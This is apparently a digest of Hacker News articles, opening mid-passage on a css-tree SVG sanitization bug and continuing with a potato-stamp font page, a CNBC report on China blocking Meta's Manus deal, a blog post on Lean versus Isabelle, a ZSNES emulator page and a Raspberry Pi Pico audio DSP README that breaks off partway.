Earlier in this post, I mentioned that "`css-tree` and the real CSS parsers in browsers might not completely match". This is a real-world example of that kind of bug allowing CSS to bypass sanitization. Note that `css-tree` currently has 48 open issues and certainly many more unknown ones. I believe depending on `css-tree` to be a perfect parser is a hopeless path that will continue to result in more vulnerabilities. TurboWarp's SVG sandbox fixed this bug before I even knew it existed.

This is not fixed. The [`css-tree` issue](https://github.com/csstree/csstree/issues/268) for this bug has been open since December 2023.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

---

## [HN-TITLE] 19. HVD Bodedo

- **Source**: [https://www.hvdfonts.com/fonts/hvd-bodedo](https://www.hvdfonts.com/fonts/hvd-bodedo)
- **Site**: HvD Fonts
- **Submitter**: cainxinth (Hacker News)
- **Submitted**: 2026-04-26 14:16 UTC (Hacker News)
- **HN activity**: 4 points · [0 comments](https://news.ycombinator.com/item?id=47910527)
- **Length**: 579 words (~3 min read)
- **Language**: en-EN

HVD Bodedo

![Bodedo Ds](https://www.hvdfonts.com/public/Bodedo_DS.jpg)

Is it possible to carve a Bodoni out of Potatoes? We tried it…

Type design is mostly precisely drawing vector curves, printing proofs and judge the grey value with a minus lense. But it can also be a group of friends coming together to have an experimental typographic evening. We had the idea to make a Bodoni interpretation with potato stamps, so we bought 8kg of potatoes, some knifes and carved a long, long evening in the kitchen. When we finally had the full aphabet we stamped it on paper, made a font out of this and called it Bodedo.

Just 1 Style

Aa

Regular

![Bodedo](https://www.hvdfonts.com/public/gallery/Bodedo_01_171206_230323.jpg)

Bodedo

![Printing](https://www.hvdfonts.com/public/gallery/Bodedo_05.jpg)

Printing

![Halfway done](https://www.hvdfonts.com/public/gallery/Bodedo_04.jpg)

Halfway done

![Cutting](https://www.hvdfonts.com/public/gallery/Bodedo_02.jpg)

Cutting

![Printed & Scanned](https://www.hvdfonts.com/public/gallery/Bodedo_06.jpg)

Printed & Scanned

“I never thought that I will see this typeface in so many supermarkets all over the world.”

*A*

*B*

*C*

*D*

*E*

*F*

*G*

*H*

*I*

*J*

*K*

*L*

*M*

*N*

*O*

*P*

*Q*

*R*

*S*

*T*

*U*

*V*

*W*

*X*

*Y*

*Z*

*a*

*b*

*c*

*d*

*e*

*f*

*g*

*h*

*i*

*j*

*k*

*l*

*m*

*n*

*o*

*p*

*q*

*r*

*s*

*t*

*u*

*v*

*w*

*x*

*y*

*z*

*Á*

*Â*

*Ä*

*À*

*Å*

*Ã*

*Æ*

*Ç*

*Ð*

*É*

*Ê*

*Ë*

*È*

*Í*

*Î*

*Ï*

*Ì*

*Ł*

*Ñ*

*Ó*

*Ô*

*Ö*

*Ò*

*Ø*

*Õ*

*Œ*

*Þ*

*Š*

*Ú*

*Û*

*Ü*

*Ù*

*Ý*

*Ÿ*

*Ž*

*á*

*â*

*ä*

*à*

*å*

*ã*

*æ*

*ç*

*ð*

*é*

*ê*

*ë*

*è*

*ı*

*í*

*î*

*ï*

*ì*

*ł*

*ñ*

*ó*

*ô*

*ö*

*ò*

*ø*

*õ*

*œ*

*þ*

*š*

*ß*

*ú*

*û*

*ü*

*ù*

*ý*

*ÿ*

*ž*

*0*

*1*

*2*

*3*

*4*

*5*

*6*

*7*

*8*

*9*

*%*

*‰*

*≈*

*~*

*÷*

*=*

*&gt;*

*≥*

*&lt;*

*≤*

*¬*

*−*

*×*

*≠*

*+*

*±*

*#*

*@*

*&*

*\**

*·*

*•*

*:*

*,*

*…*

*!*

*¡*

*.*

*?*

*¿*

*"*

*"*

*;*

*\_*

*{*

*}*

*[*

*]*

*(*

*)*

*—*

*–*

*-*

*«*

*»*

*‹*

*›*

*„*

*“*

*”*

*‘*

*’*

*‚*

*¢*

*¤*

*$*

*€*

*ƒ*

*£*

*¥*

*|*

*¦*

*&*

*¶*

*©*

*®*

*℗*

*§*

*™*

*°*

*^*

*†*

*‡*

*A*

*B*

*C*

*D*

*E*

*F*

*G*

*H*

*I*

*J*

*K*

*L*

*M*

*N*

*O*

*P*

*Q*

*R*

*S*

*T*

*U*

*V*

*W*

*X*

*Y*

*Z*

*a*

*b*

*c*

*d*

*e*

*f*

*g*

*h*

*i*

*j*

*k*

*l*

*m*

*n*

*o*

*p*

*q*

*r*

*s*

*t*

*u*

*v*

*w*

*x*

*y*

*z*

*Á*

*Â*

*Ä*

*À*

*Å*

*Ã*

*Æ*

*Ç*

*Ð*

*É*

*Ê*

*Ë*

*È*

*Í*

*Î*

*Ï*

*Ì*

*Ł*

*Ñ*

*Ó*

*Ô*

*Ö*

*Ò*

*Ø*

*Õ*

*Œ*

*Þ*

*Š*

*Ú*

*Û*

*Ü*

*Ù*

*Ý*

*Ÿ*

*Ž*

*á*

*â*

*ä*

*à*

*å*

*ã*

*æ*

*ç*

*ð*

*é*

*ê*

*ë*

*è*

*ı*

*í*

*î*

*ï*

*ì*

*ł*

*ñ*

*ó*

*ô*

*ö*

*ò*

*ø*

*õ*

*œ*

*þ*

*š*

*ß*

*ú*

*û*

*ü*

*ù*

*ý*

*ÿ*

*ž*

*0*

*1*

*2*

*3*

*4*

*5*

*6*

*7*

*8*

*9*

*%*

*‰*

*≈*

*~*

*÷*

*=*

*&gt;*

*≥*

*&lt;*

*≤*

*¬*

*−*

*×*

*≠*

*+*

*±*

*#*

*@*

*&*

*\**

*·*

*•*

*:*

*,*

*…*

*!*

*¡*

*.*

*?*

*¿*

*"*

*"*

*;*

*\_*

*{*

*}*

*[*

*]*

*(*

*)*

*—*

*–*

*-*

*«*

*»*

*‹*

*›*

*„*

*“*

*”*

*‘*

*’*

*‚*

*¢*

*¤*

*$*

*€*

*ƒ*

*£*

*¥*

*|*

*¦*

*&*

*¶*

*©*

*®*

*℗*

*§*

*™*

*°*

*^*

*†*

*‡*

![](https://www.hvdfonts.com/public/worldmap.svg)

HVD Bodedo has 208 characters and supports 22 languages:

Afrikaans, Basque, Breton, Catalan, Danish, Dutch, English, Finnish, French, Gaelic (Irish, Scots), German, Icelandic, Indonesian, Irish, Italian, Norwegian, Portuguese, Saami (Southern), Spanish, Swahili, Swedish.

---

## [HN-TITLE] 20. China blocks Meta's acquisition of AI startup Manus

- **Source**: [https://www.cnbc.com/2026/04/27/meta-manus-china-blocks-acquisition-ai-startup.html](https://www.cnbc.com/2026/04/27/meta-manus-china-blocks-acquisition-ai-startup.html)
- **Site**: CNBC
- **Author**: April Roach, Evelyn Cheng, Kai Nicol-Schwarz
- **Published**: 2026-04-27
- **HN activity**: 322 points · [216 comments](https://news.ycombinator.com/item?id=47920315)
- **Length**: 467 words (~3 min read)
- **Language**: en

China's state planner on Monday called for [Meta](https://www.cnbc.com/quotes/META/) to unwind its [$2 billion acquisition](https://www.cnbc.com/2025/12/30/meta-acquires-singapore-ai-agent-firm-manus-china-butterfly-effect-monicai.html) of Manus, a Singaporean artificial intelligence startup with Chinese roots.

The decision to prohibit foreign investment in Manus was made in accordance with laws and regulations, the National Development and Reform Commission said in a brief statement. It added that it has asked the parties involved to withdraw the acquisition transaction.

A Meta spokesperson said that the transaction "complied fully with applicable law."

"We anticipate an appropriate resolution to the inquiry," the spokesperson added. Shares of Meta closed 0.53% higher on Monday.

The deal had attracted scrutiny from both China and Washington, as lawmakers in the U.S. have prohibited American investors from backing Chinese AI companies directly. Meanwhile, Beijing has increased efforts to discourage Chinese AI founders from moving business offshore.

![Meta buys Manus to scale AI agents across its platform](https://image.cnbcfm.com/api/v1/image/108246888-17671286231767128620-43248228984-1080pnbcnews.jpg?v=1767128622&w=750&h=422&vtcrop=y)

watch now

The Chinese government's intervention in the transaction drew [alarm among tech founders and venture capitalists](https://www.cnbc.com/2026/03/27/meta-manus-china-review-singapore-washing-model-regulation-.html) in the country who were hoping to take advantage of the so-called Singapore-washing model, where companies relocate from China to the city-state to avoid scrutiny from Beijing and Washington.

Manus was founded in China before relocating to Singapore. The company develops general-purpose AI agents and launched its first general [AI agent](https://www.cnbc.com/2025/12/29/ai-agentic-shopping-price-discounts-cheap-sales-commerce-visa-mastercard-chatbots.html) in March last year, which can execute complex tasks such as market research, coding and data analysis. The release saw the startup lauded as the next DeepSeek.

Manus said it had passed $100 million in annual recurring revenue, or ARR, in December, eight months on from launching a product, which it claimed made it the fastest startup in the world at the time to hit the milestone from $0.

The company raised $75 million in a round led by U.S. VC Benchmark in April last year.

[![CHONGQING, CHINA - JANUARY 07: In this photo illustration, the Manus logo is displayed on a smartphone screen, with the Chinese national flag visible in the background, on January 7, 2026 in Chongqing, China. ](https://image.cnbcfm.com/api/v1/image/108268327-1771834320710-gettyimages-2255015557-img_4593.jpeg?v=1771834801&w=160&h=90)](https://www.cnbc.com/2026/03/27/meta-manus-china-review-singapore-washing-model-regulation-.html)

When Meta announced the deal late last year, the tech giant said it would look to accelerate artificial intelligence innovation for businesses and integrate advanced automation into its consumer and enterprise products, including its Meta AI assistant.

But in January, China's Ministry of Commerce said it would conduct an assessment and investigation into how the acquisition complied with laws and regulations concerning export controls, technology import and export, and overseas investment.

A Meta spokesperson told CNBC that the transaction ["complied fully with applicable law,"](https://www.cnbc.com/2026/03/18/metas-manus-launches-desktop-app-to-bring-its-ai-agent-onto-personal-devices.html) and that it anticipated "an appropriate resolution to the inquiry."

When asked about China's move to block Meta's acquisition of Manus, APEC Senior Officials Meeting Chairman Chen Xu told reporters that it is "important that all parties act in a spirit of mutual benefit."

While Chen said he did not know the specifics of the issue, he said that "if such an issue can be handled properly, it can help facilitate more substantive discussions in APEC." That's according to an official English translation.

*— CNBC's Anniek Bao and Dylan Butts contributed to this story.*

---

## [HN-TITLE] 21. “Why not just use Lean?”

- **Source**: [https://lawrencecpaulson.github.io//2026/04/23/Why\_not\_Lean.html](https://lawrencecpaulson.github.io//2026/04/23/Why_not_Lean.html)
- **Site**: lawrencecpaulson.github.io
- **Submitter**: ibobev (Hacker News)
- **Submitted**: 2026-04-27 14:24 UTC (Hacker News)
- **HN activity**: 263 points · [181 comments](https://news.ycombinator.com/item?id=47922079)
- **Length**: 1.8K words (~8 min read)
- **Language**: en

23 Apr 2026

\[ [`AUTOMATH`](https://lawrencecpaulson.github.io/tag/AUTOMATH)  [`LCF`](https://lawrencecpaulson.github.io/tag/LCF)  [`HOL system`](https://lawrencecpaulson.github.io/tag/HOL_system)  [`HOL Light`](https://lawrencecpaulson.github.io/tag/HOL_Light)  [`Lean`](https://lawrencecpaulson.github.io/tag/Lean)  [`formalised mathematics`](https://lawrencecpaulson.github.io/tag/formalised_mathematics)  ]

I have been told that when proposing to formalise mathematics these days, you have to explain why you are not using Lean. And that reminds me why I left the dependent-typed world 40 years ago: its cultism, insularity and conformity. Lean is a great language with good tools, a large library and a huge, enthusiastic user community that has lately accomplished astounding things. But let’s not forget that the formalisation of mathematics goes back nearly 60 years. Amidst the hype around today’s progress, we must remember how we got here. It was not by people following the crowd.

### In the beginning, there was AUTOMATH

Part of the hype mentioned above is the frequent claim “Lean has made the formalisation of mathematics possible”. Sorry, we got there in 1968. NG de Bruijn’s [AUTOMATH](https://lawrencecpaulson.github.io/tag/AUTOMATH) already included most of the necessary ingredients. By 1977, Jutting had used it to formalise Landau’s *Foundations of Analysis*, which covers the construction of the complex numbers starting from pure logic. Jutting worked with equivalence classes and with sets of rational numbers. He formally proved the Dedekind completeness of the real number line. His accomplishment would not be matched for 20 years, despite vast advances in computer power. Finally, in the mid-90s, the real numbers were formalised again by John Harrison (using HOL Light) and Jacques Fleuriot (Isabelle/HOL).

I believe that almost anything that has been formalised today in any system could have been formalised in AUTOMATH. Its main drawbacks were its notation, which really was horrible, and its complete lack of automation. Proofs were long and unreadable.

And yet, for reasoning about equivalence classes, it is **still** probably better than Rocq. For while users of the latter rail against “setoid hell”, Jutting in his dissertation dispassionately describes his formalisation of equivalence classes. He even formalised one of Landau’s chapters a second time, adopting equivalence classes because he thought they were the right approach.

### And just after, there were Boyer and Moore

From a completely different corner came [the work of Robert Boyer, J Moore](https://doi.org/10.1007/s00165-019-00490-3) and their many colleagues. First announced in 1973 with the title “[Proving theorems about LISP functions](https://doi.org/10.1145/321864.321875)”, they set out their objective as the verification of code, not mathematics. Their “computational logic” has clear limitations for general mathematics, but this has not prevented its use in formalising a variety of deep results, ranging from [Gödel’s incompleteness theorem](https://www.cambridge.org/core/books/metamathematics-machines-and-godels-proof/B97649A08193300A18EA41D53FC87214) to [quadratic reciprocity](https://doi.org/10.1007/BF00263446) to the [Banach–Tarski theorem](https://doi.org/10.4230/LIPIcs.ITP.2022.5). The current incarnation is called ACL2 and it is chiefly applied to hardware verification. You can go far by being different.

### After LCF: Coq, HOL and Isabelle

The groundbreaking [Edinburgh LCF](https://lawrencecpaulson.github.io/2022/09/28/Cambridge_LCF.html) focused narrowly on programming language theory, but its idea of having a functional programming language as the *metalanguage* (hence ML) of a proof assistant had a broad impact. Groups in Cambridge, INRIA, Cornell and further afield built tools using ML, including early versions of HOL, Coq (now Rocq) and Nuprl. The HOL group was firmly fixated on hardware verification, but the need to verify floating point hardware brought with it a need for real analysis. Soon, [John Harrison had proved](https://doi.org/10.1007/978-1-4471-1591-5) some serious mathematics, such as the prime number theorem via Cauchy’s integral formula. He set himself the task of verifying as many of the famous [*100 theorems*](https://www.cs.ru.nl/~freek/100/) as possible, and HOL Light often tops the table. If Isabelle has sometimes surpassed HOL Light, it is because I stole so many of their formalisations.

By 2014, these systems had been used to formalise a string of advanced results. Here is a fairly arbitrary list:

- the [four colour theorem](https://www.ams.org/notices/200811/tx081101382p.pdf)
- the [odd order theorem](https://doi.org/10.1145/2480359.2429071)
- the [relative consistency](https://doi.org/10.1112/S1461157000000449) of the axiom of choice
- Gödel’s [second incompleteness theorem](https://rdcu.be/eSZwv)
- Tom Hales’ proof of the [Kepler conjecture](https://doi.org/10.1017/fmp.2017.1)

These theorems mostly had long and intricate proofs. Their formalisations, major pieces of work, were key to reducing any residual doubts about the theorems. And yet, few mathematicians were impressed. Notable exceptions were Dana Scott and Ken Kunen, both set theorists.

I know little about the development of Lean itself, but I know a bit about how it swept through the mathematical community. Mathematicians had noted dubiously that none of the proofs mentioned above involved the sort of sophisticated constructions that arise in mainstream mathematics: things such as Grothendieck schemes and perfectoid spaces. Tom Hales had the idea of building up a library of such definitions – just the definitions, never mind the proofs – and he chose Lean for that purpose. He spoke at the Newton Institute programme [Big Proof](https://www.newton.ac.uk/event/bpr/), where many similar ideas were discussed. Kevin Buzzard heard of this and decided to try out Lean for teaching. The rest is history.

A key act of the Lean community was to abandon the curious obsession with “constructive proofs” that had dominated Rocq for its entire existence. As I’ve discussed previously, the philosophy of [intuitionism](https://lawrencecpaulson.github.io/2021/11/24/Intuitionism.html) arose in the aftermath of Russell’s paradox. It had particular implications for the real numbers. While [Martin-Löf type theory](https://www.jstor.org/stable/37448) was recognisably an intuitionistic formalism, that’s not so clear for Rocq. And yet, paper after paper mentioned “constructive proof” where it was irrelevant and sometimes nonsensical. This obsession hindered the application of Rocq to mathematics, leaving the field to Lean.

### Not everything is “propositions as types”

[*Propositions as types*](https://lawrencecpaulson.github.io/2023/08/23/Propositions_as_Types.html) is a duality linking the logical signs $\\forall$, $\\exists$, $\\to$, $\\wedge$, $\\vee$ with the type constructors $\\Pi$, $\\Sigma$, $\\to$, $\\times$, $+$. It is beautiful, fascinating and theoretically fruitful, but it is not the only game out there. I have seen “proof assistant” *defined* as a piece of software that checks proofs according to the principle of propositions as types. And just like that, most of the research of the past half century is wiped away. Nothing would be left except Rocq, Lean and [Agda](https://hackage.haskell.``org/package/Agda) (which implements Martin-Löf type theory).

Even AUTOMATH is not an instance of propositions as types. Although it has versions of $\\Pi$ and $\\to$, you set up logic using axioms resembling those in any logic text. De Bruijn understood, 50 years ago, that the categories of types and propositions needed to be kept distinct for a number of reasons. Most obviously, the division operator would have to take three arguments, and the value of $x/y$ would actually depend on the proof that $y\\not=0$. He noted that we must have *irrelevance of proofs*.

I have even heard well-informed people say “the LCF approach is the same thing as propositions as types”. This is quite untrue, and there’s [an entire blogpost](https://lawrencecpaulson.github.io/2022/01/05/LCF.html) trying to clear up this nonsense.

### LCF (again): we don’t need proof objects!

Both Rocq and Lean include the sort `Prop` of propositions. This provides proof irrelevance, and in particular, all proof objects for a given proposition evaluate to the same value. So these massive terms are unnecessary, but are kept anyway. Why?

That proof objects are unnecessary was [Robin Milner’s key discovery](https://lawrencecpaulson.github.io/2022/01/05/LCF.html) for LCF. All you need is a programming language (ML!) providing abstract data types. Put your proof kernel inside an abstract data type, with the inference rules at the constructors, and bingo! the proofs are checked dynamically. It is impossible to cheat thanks to ML’s abstraction barriers.

I once had the surreal experience of trying to explain this 50-year-old idea to somebody from the propositions as types world. This was no student but one of the world’s leading experts on functional programming, someone for whom the origin story of the ML language should be core knowledge. It took quite a while and I don’t think he was convinced: an example of the insularity that I mentioned above.

It is nuts, in the age of [RAMmageddon](https://www.nature.com/articles/d41586-026-00844-x), to waste tens of megabytes on giant terms that denote nothing. There is even research into making these useless things elegant.

### Why should you use Isabelle?

Let’s get the obvious out of the way first: if your colleagues are using Lean, they have expertise in Lean, and if your key prerequisites are in the Lean libraries, of course you should use Lean.

But if you are free to choose, a key purpose of this blog is to give you reasons to consider Isabelle. They include

- **the best automation anywhere**. Don’t be fooled by people talking about “hammers” as everyday things: there is nothing comparable to sledgehammer. Plus much more. I also need to write about computer algebra.
- **the best choice for legibility**. This blog presents [numerous examples](https://lawrencecpaulson.github.io/tag/Isar).
- **no dependent types**, so no universe levels and none of the quirks that trap beginners. Remember, dependent types are discouraged in Lean’s mathlib and in Rocq’s SSReflect and Mathematical Components.

A key difficulty with dependent types is that, if done properly, type checking must be undecidable. That’s because equality is undecidable, and in the early days, this fact was taken for granted. However, around 1990, the consensus shifted. To make type checking decidable, equality was downgraded to *definitional* or *intensional* equality. This is why $T(N+1)$ and $T(1+N)$ are different types. Although this limitation has real repercussions for proofs, testing definitional equality is (still!) a heavy computational burden.

To be fair, if you’d asked me back in 2017 what sort of mathematics Isabelle could handle, I’d have been much more cautious. It’s easy to imagine that dependent types are necessary to handle such things as

- [field extensions](https://rdcu.be/cIK3W)
- [p-adic numbers](https://www.isa-afp.org/entries/Padic_Field.html)
- [Grothendieck schemes](https://doi.org/10.1080/10586458.2022.2062073)

But a bunch of us [did some research](https://www.cl.cam.ac.uk/~lp15/Grants/Alexandria/) and learned a lot. The trick is to stop forcing everything to be a type.

### To the future

Lean gets a lot of things right. And Lean has the potential to be legibile, even supporting nested proof blocks. Now its user community must take advantage of these features, as Isabelle users are mostly doing already. The ultimate transparency is not a proof object that a computer can check but a proof text that a human being can actually read.

The rise of AI is making these differences starker. AI proofs tend to be messy, but it’s easy to tidy them using sledgehammer. Since they are nicely structured –– in my limited experience, using Claude –– they are legible despite their often excessive detail. You can see what is going on and look for ways to simplify them. There is also [recent research](https://arxiv.org/abs/2604.07455) where the language models themselves call sledgehammer. Finally, AI can easily translate legible structured proofs from one proof assistant to another. Then, you no longer need to worry about which one you choose.

*\[Many thanks to Wenda Li for comments!]*

### Mizar, with apologies

*\[Added 15 April 2026]*

Somehow, I forgot Mizar again. No history of the formalisation of mathematics is complete without a discussion of [Mizar](https://mizar.uwb.edu.pl) and its extensive [mathematical library](https://mizar.uwb.edu.pl/library/). Making the omission worse, Isabelle’s Isar language borrows heavily from Mizar. My next blogpost will be about Mizar, I promise!

---

## [HN-TITLE] 22. Super ZSNES – GPU Powered SNES Emulator

- **Source**: [https://zsnes.com/](https://zsnes.com/)
- **Site**: zsnes.com
- **Submitter**: haunter (Hacker News)
- **Submitted**: 2026-04-27 17:50 UTC (Hacker News)
- **HN activity**: 252 points · [69 comments](https://news.ycombinator.com/item?id=47924877)
- **Length**: 428 words (~2 min read)
- **Language**: en

## Welcome to SUPER ZSNES

The two original developers of ZSNES are finally back together! Introducing SUPER ZSNES! Re-written completely from scratch, this GPU-powered SNES emulator is here to bring you the following: some of what is familiar, some of what's new, and then some of what goes beyond.

## Key Features

- Far more accurate CPU and Audio cores than the original ZSNES
- GPU-powered PPU core to allow for hi-res Mode 7 and special per-game enhancement features
- Classic UI with falling snow, modernized with higher definition and improved UX
- Fast forward, rewind, save states, auto save history, save bookmarks, cheat codes, quick load, and more
- No Vibe Coding. Classic development style.
- Super Enhancement Engine, where the ZSNES developers are enhancing the games one at a time

## Super Enhancement Engine

Currently implemented with support for 7 popular games. Support for more games will keep increasing as this emulator is in development.

- **High Resolution** - Not just an auto upscalar, but an internal drawing program is used to make sure that the higher resolution details can be manually drawn to look nice and crisp.
- **Texture/Normal Map** - Adds some nice details to the backgrounds to give them a higher resolution look.
- **Overclock** - Select games often filled with slowdown are overclocked.
- **Wide Screen** (where available) - We enable widescreen whenever the game is internally coded to support partial or full widescreen.
- **Uncompressed Audio Replacement** - We curate and pick uncompressed audio samples to replace original highly compressed audio samples.
- **3D** - Currently only supported on perspective-style Mode 7, replaces tiles with 3D height mapped data.
- All enhancements can be individually disabled to suit your play style.

Note: Enhancement data contains no ROM or copyrighted data. You will need to provide the ROMs. Do not ask the developers for ROMs.

## Downloads

### iOS

Coming Soon

## What's Coming

- Bug fixes
- Special chip emulation (DSP1, SuperFX, etc.)
- More optimization work
- More types of enhancements
- Netplay
- Other features

## Notes & Legal

This is an early build, so there are still emulation bugs and special chips (DSP1, SuperFX, etc.) have yet to be implemented. A bunch of optimization work has yet to be done so performance may be a bit slow.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

The SUPER ZSNES Team is not connected or affiliated with any mentioned company in any way. Companies and all products pertaining to that company are trademarks of that company. Please contact that company for trademark and copyright information.

---

## [HN-TITLE] 23. Fully Featured Audio DSP Firmware for the Raspberry Pi Pico

- **Source**: [https://github.com/WeebLabs/DSPi](https://github.com/WeebLabs/DSPi)
- **Site**: GitHub
- **Submitter**: BoingBoomTschak (Hacker News)
- **Submitted**: 2026-04-25 13:28 UTC (Hacker News)
- **HN activity**: 267 points · [77 comments](https://news.ycombinator.com/item?id=47901433)
- **Length**: 5.8K words (~26 min read)
- **Language**: en

**DSPi** transforms a Raspberry Pi Pico or other RP2040-based board into a very competent and inexpensive little digital audio processor. It acts as a USB sound card with an onboard DSP engine, allowing you to make use of essential tools like room correction, active crossovers, parametric EQ, time alignment, loudness compensation, and headphone crossfeed.

It is my hope that the RP2040 and RP2350 will garner a reputation as the "swiss army knife of audio for less than a cup of coffee".

Feel free to join the [official Discord server](https://discord.gg/RCyqxAQ5xS) for development updates, discussion or to request assistance!

* * *

## Table of Contents

[](#table-of-contents)

- [Key Capabilities](#key-capabilities)
- [Platform Support](#platform-support)
- [Audio Signal Chain](#audio-signal-chain)
- [Hardware Setup](#hardware-setup)
- [DSP Features](#dsp-features)
  
  - [Matrix Mixer](#matrix-mixer)
  - [Parametric Equalization](#parametric-equalization)
  - [Loudness Compensation](#loudness-compensation)
  - [Headphone Crossfeed](#headphone-crossfeed)
  - [Volume Leveller](#volume-leveller)
  - [Per-Channel Preamp](#per-channel-preamp)
  - [Master Volume](#master-volume)
  - [I2S Output](#i2s-output)
  - [Subwoofer PDM Output](#subwoofer-pdm-output)
- [User Presets](#user-presets)
- [Developer Reference](#developer-reference)
  
  - [System Architecture](#system-architecture)
  - [Performance Tuning](#performance-tuning)
  - [USB Control Protocol](#usb-control-protocol)
  - [System Telemetry](#reqgetstatus-0x50---system-telemetry)
  - [Data Structures](#data-structures)
- [Building from Source](#building-from-source)
- [Detailed Specifications](#detailed-specifications)
- [License](#license)

* * *

## Key Capabilities

[](#key-capabilities)

- **USB Audio Interface:** Plug-and-play under macOS, Windows, Linux, and iOS. Supports 16-bit and 24-bit PCM input at 44.1, 48, and 96 kHz.
- **24-bit S/PDIF or I2S Outputs:** Up to four independent stereo output slots (8 channels on RP2350, 4 channels on RP2040). Each slot can be switched at runtime between S/PDIF and I2S, enabling direct connection to any standard DAC. I2S slots share a common BCK/LRCLK and can optionally produce a 128×/256× master clock.
- **Per-Channel Preamp:** Independent gain control for each USB input channel (L/R), applied as PASS 1 of the DSP pipeline before any other processing.
- **Matrix Mixer:** Route either or both USB input channels to any output with independent gain and phase invert per crosspoint. 2x9 on RP2350, 2x5 on RP2040.
- **Parametric Equalization:** Up to 10 PEQ bands per channel with 6 filter types. 110 total filter bands on RP2350, 70 on RP2040. RP2350 uses a hybrid SVF/biquad architecture for superior low-frequency accuracy.
- **Volume Leveller:** RMS-based, stereo-linked, soft-knee upward compressor that lifts quieter content toward a target level without ever amplifying loud passages. Optional 10 ms lookahead, configurable speed and max-gain ceiling, with a -6 dBFS gain-reduction safety limiter.
- **Loudness Compensation:** Volume-dependent EQ based on the ISO 226:2003 equal-loudness contour standard. Automatically boosts bass and treble at low listening levels to maintain perceived tonal balance.
- **Headphone Crossfeed:** BS2B-based crossfeed with interaural time delay (ITD) reduces unnatural stereo separation for headphone listening. Three classic presets plus fully custom parameters.
- **Master Volume:** Device-side output ceiling (-128 to 0 dB, with a true-mute sentinel) applied at the very end of the signal chain, independent of USB host volume and DSP processing. Two persistence modes: stored independently of presets (default — survives reboots, unaffected by preset switching) or saved/restored as part of each preset.
- **Per-Output Gain & Mute:** Independent gain and mute controls for each output channel.
- **Time Alignment:** Per-output delay (up to 85ms) for speaker/subwoofer alignment with automatic latency compensation between S/PDIF/I2S and PDM output paths.
- **Subwoofer Output:** Dedicated mono PDM output channel with a high-performance 2nd-order delta-sigma modulator, enabling direct subwoofer output without the need for a second DAC.
- **Dual-Core DSP:** EQ processing is split across both cores on both platforms for maximum throughput when multiple outputs are active.
- **Configurable Output Pins:** All output GPIO pins (including I2S BCK/MCK) can be reassigned at runtime to suit custom PCB layouts, no reflashing required.
- **10-Slot Preset System:** Save, load, and manage up to 10 complete DSP configurations with user-defined names. Includes per-channel naming, configurable startup slot, and bulk parameter transfer for fast state synchronization.
- **Diagnostics:** Per-channel peak/clip metering, USB PHY error counters (CRC, bit-stuff, timeout, overflow, sequence), buffer fill statistics, S/PDIF DMA starvation counters per output slot, and CPU load reporting per core.
- **Firmware Update via USB:** A vendor command reboots the device into the UF2 bootloader, allowing the host app to push new firmware without a physical BOOTSEL press.

* * *

## Platform Support

[](#platform-support)

Feature RP2040 (Pico) RP2350 (Pico 2) **System Clock** 307.2 MHz (overclock) 307.2 MHz **Core Voltage** 1.15 V 1.15 V **Sample Rates** 44.1 / 48 / 96 kHz 44.1 / 48 / 96 kHz **Audio Processing** Q28 Fixed-Point Single-Precision Float **EQ Bands** 10 per channel (70 total) 10 per channel (110 total) **Total Channels** 7 (2 master + 4 S/PDIF·I2S + 1 PDM) 11 (2 master + 8 S/PDIF·I2S + 1 PDM) **Output Slots** 2 stereo (each S/PDIF or I2S) 4 stereo (each S/PDIF or I2S) **Output Bit Depth** 24-bit 24-bit **PDM Output** 1 (subwoofer) 1 (subwoofer) **Max Delay** 85ms per output 85ms per output **Math Engine** Hand-optimized ARM Assembly Hardware FPU (hybrid SVF/biquad EQ) **Dual-Core EQ** Yes (Core 1 processes outputs 3-4) Yes (Core 1 processes outputs 3-8) **User Presets** 10 slots 10 slots **Status** Production Production

Both platforms are fully tested and production-ready. The RP2040 reaches 307.2 MHz with a slight voltage bump; the RP2350 hits the same frequency at the same voltage. Clock is fixed (no rate-dependent switching), and PIO dividers are integer at every supported sample rate. The RP2350 offers significantly more processing headroom thanks to its hardware floating-point unit, enabling more output channels and a hybrid SVF/biquad filter architecture for improved low-frequency accuracy.

* * *

## Audio Signal Chain

[](#audio-signal-chain)

DSPi processes audio in a linear, low-latency pipeline:

**RP2350 (11 channels, 9 outputs):**

```
USB Input (16/24-bit PCM Stereo, 44.1 / 48 / 96 kHz)
    |
PASS 1: Per-Channel Preamp (independent L/R gain) + USB Volume
    |
PASS 2: Master EQ (10 bands per channel, Left/Right)
    |
PASS 2.5: Volume Leveller (RMS upward compression, optional)
    |
PASS 3: Headphone Crossfeed (BS2B + ITD, optional) + Master Peak Metering
    |
        Loudness Compensation (volume-dependent EQ, optional)
    |
PASS 4: Matrix Mixer (2 inputs x 9 outputs, per-crosspoint gain & phase)
    |
PASS 5: Per-Output EQ -> Gain/Mute -> Delay -> Output Gain × Master Volume
    |
    +-- Out 1-2 --> S/PDIF or I2S slot 0 (data: GPIO 6 default)
    +-- Out 3-4 --> S/PDIF or I2S slot 1 (data: GPIO 7 default)
    +-- Out 5-6 --> S/PDIF or I2S slot 2 (data: GPIO 8 default)
    +-- Out 7-8 --> S/PDIF or I2S slot 3 (data: GPIO 9 default)
    +-- Out 9   --> PDM Sub               (data: GPIO 10 default)
                  (I2S BCK/LRCLK shared on GPIO 14/15 default; optional MCK on GPIO 13 default)
```

**RP2040 (7 channels, 5 outputs):**

```
USB Input (16/24-bit PCM Stereo, 44.1 / 48 / 96 kHz)
    |
PASS 1: Per-Channel Preamp + USB Volume
    |
PASS 2: Master EQ (10 bands per channel, Left/Right)
    |
PASS 2.5: Volume Leveller (RMS upward compression, optional)
    |
PASS 3: Headphone Crossfeed (BS2B + ITD, optional) + Master Peak Metering
    |
        Loudness Compensation (volume-dependent EQ, optional)
    |
PASS 4: Matrix Mixer (2 inputs x 5 outputs, per-crosspoint gain & phase)
    |
PASS 5: Per-Output EQ -> Gain/Mute -> Delay -> Output Gain × Master Volume
    |
    +-- Out 1-2 --> S/PDIF or I2S slot 0 (data: GPIO 6 default)
    +-- Out 3-4 --> S/PDIF or I2S slot 1 (data: GPIO 7 default)
    +-- Out 5   --> PDM Sub               (data: GPIO 10 default)
                  (I2S BCK/LRCLK shared on GPIO 14/15 default; optional MCK on GPIO 13 default)
```

### Signal Chain Details

[](#signal-chain-details)

